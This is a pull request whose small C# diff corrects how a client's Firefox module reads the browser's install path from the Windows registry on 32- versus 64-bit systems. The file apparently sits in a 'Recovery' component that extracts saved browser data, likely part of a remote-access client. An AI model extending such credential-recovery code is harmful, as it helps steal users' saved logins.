### PR TITLE
Fix firefox registry path

### DIFF
--- a/Client/Core/Recovery/Browsers/Firefox.cs
+++ b/Client/Core/Recovery/Browsers/Firefox.cs
@@ -202,8 +202,11 @@ namespace xClient.Core.Recovery.Browsers
         private static DirectoryInfo GetFirefoxInstallPath()
         {
             // get firefox path from registry
-            using (RegistryKey key = RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.LocalMachine,
-                    @"SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox"))
+            using (RegistryKey key = PlatformHelper.Architecture == 64 ?
+                RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.LocalMachine,
+                    @"SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox") :
+                RegistryKeyHelper.OpenReadonlySubKey(RegistryHive.LocalMachine,
+                    @"SOFTWARE\Mozilla\Mozilla Firefox"))
             {
                 if (key == null) return null;
 


### PR DESCRIPTION
Fixed obtaining Firefox path from registry.  Firefox path will only be in Wow6432Node if OS is 64-bit.